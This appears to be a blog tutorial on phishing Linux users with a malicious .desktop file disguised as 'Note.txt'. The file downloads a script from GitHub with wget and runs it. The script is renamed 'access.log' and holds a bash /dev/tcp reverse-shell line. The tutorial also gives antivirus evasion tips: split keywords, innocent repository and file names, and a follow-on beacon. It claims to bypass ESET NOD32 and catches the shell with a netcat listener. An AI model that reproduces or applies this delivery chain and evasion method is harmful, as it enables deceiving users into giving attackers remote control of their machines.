Introduction

All the phishing campaigns that attackers perform are on windows users and that’s normal as Windows widely used operating system. But, we will see how to perform phishing on Linuxusers effectively & undetectable through the .desktop "Desktop Entry" file and deliver our payload through trusted websites such as (Github&Gitlab). Also, We will run our Destop Entry on Ubuntu machine and the Eset nod32 Anti-Virus is installed & running.

What is .desktop “Desktop Entry” file ?

Basically, .desktop file is like a shortcut file in windows for Linux , Therefore, you can use it to indicate to an application and once the .desktop file executed it will run the application that the file points to it. Now, We can create a custom .desktop file and make it indicate to the /bin/sh which is the Linux shell and execute commands to download the payload, or just connect out the target to our server & receive a shell.

Desktop Entry Basics

We gonna cover some basic syntax and don’t worry it’s not complicated at all & it’s very simple. So, as any code you have to define the start point in the file and we doing it using [Desktop Entry] as the first line into the file (You can create a file and name it name.desktop and start writing into it) . The Desktop Entry files syntax basically can be considered as a key & value (e.x:Name=AppName "Key=Value" ). The Key is defined before in the Desktop Entry syntax and each one has a specific role & the value is given by the user.

Now, let’s discover the Keys:

Name: Set the name of the file.

Type: The type of the Desktop Entry (The file type could be 3 things Application,LinkandDirectory)

each Type of a Desktop Entry takes different Keys. The Application takes a path to the program will be run, Also it can carry arguments related to the program (e.x:/bin/sh -c "touch /tmp/testfile").

Version: The Version of the Entry file.

Icon: Desktop File icon to display.

Exec: The path of the program to run (including the arguments as well) .

We will not be using a lot of keys for our file. If you wanna know more keys& more details you can check it out from Here.

Now, Before we start creating our file, Let’s get our payload ready on payload ready on github.

Host the payload on github & gitlab

As github and gitlab are a trusted organization we will be able to make sure that our payload will be delivered successfully (Note:Maybe github or gitlab be blocked in some organizations "Rarely happen") . Now, i am gonna use github for explaining but at all you can use githuborgitlab. First thing is to create a new repository and give it a non-suspicious name (e.x: don’t use Myshell,Payload, reverse,bind and so on) instead use normal and known names “Not just for the repository. But, also for our payload name” and also for the file extension. As we are targeting Linux users, We can run the payload from the shell as the following ./app.ext no matter the extension is elf or whatever.

I named the repository VsocietySolution & A short description. Then, created the repository . Now, i will create a new shell file which contains some scripting codes, including bash -i >& /dev/tcp/$Nothin/$Nothing 0>&1 which basically run interactive bash shell and connect to us through the /dev/tcp (you can use udp instead of tcp) based on what type of protocols you listen on for the connection.

Here you can see the file and the code. So, what i did here is to little obfuscate in the code and it’s by sperate the words that can be detected by the anti-virus (e.x:bash,/dev/tcp or even if the AV performing some regex to detect if there is any IP address). Also, obfuscated the file name itself by changing it to access.log.

Create .desktop File

It’s the time to create our malicious .desktop file to deliver it to the victim and as we understand the syntax we will be able to create it easily. Now, create a new file and name it any.desktop. Then, open it with any text editor you have.

I named the file vsociety.desktopand as you can see it says the file is Unnamed we will now add a name for the file and the full code.

Here I made the name Note.txt, Then Exec will execute the sh Linux shell and -c argument is for command to be executed by the Linux shell. So, the command that gonna be executed will go to tmp directory and then download our shell script using wget (wget mostly installed by default on linux systems) Then, it will give the execute permission for our file which is access.log and after that will execute it. At the last line, I choose an Icon to use. But, debian Linux actually set an icon automatically according to file name. And you can find the icon you want to set for the file in the system. Just use locate icon | grep text it will locate files/paths with the icon word and filter out the one that has the word txt.

Getting a shell

Now, we will try our malicious file on an updated ubuntu box with Eset nod32 Anti-Virus Installed and we will bypass it. First of all let’s start our netcatlistener on our Attacker box, In the shell script file we set 8080 as the connection port. So, we will start our listener on port 8080.

Our Anti-Virus is running and we will run our file.

We executed the Desktop Enry file and as the following:

As can see that our access.log file downloaded and is in the /tmp directory as we configured the command inside our .desktop file. And the file is executed successfully and we got a shell on the attacker box.

Conclusion

This was a very easy way to perform phishing on linux users easily without need to develop any malware or having ours in doing research to see an effective way without getting detected, At all you can use the same way to get a shell and after that you could upload your beacon and don’t forget to use non-suspicious names & obfuscation.

#linux #phishing #attack #tutorial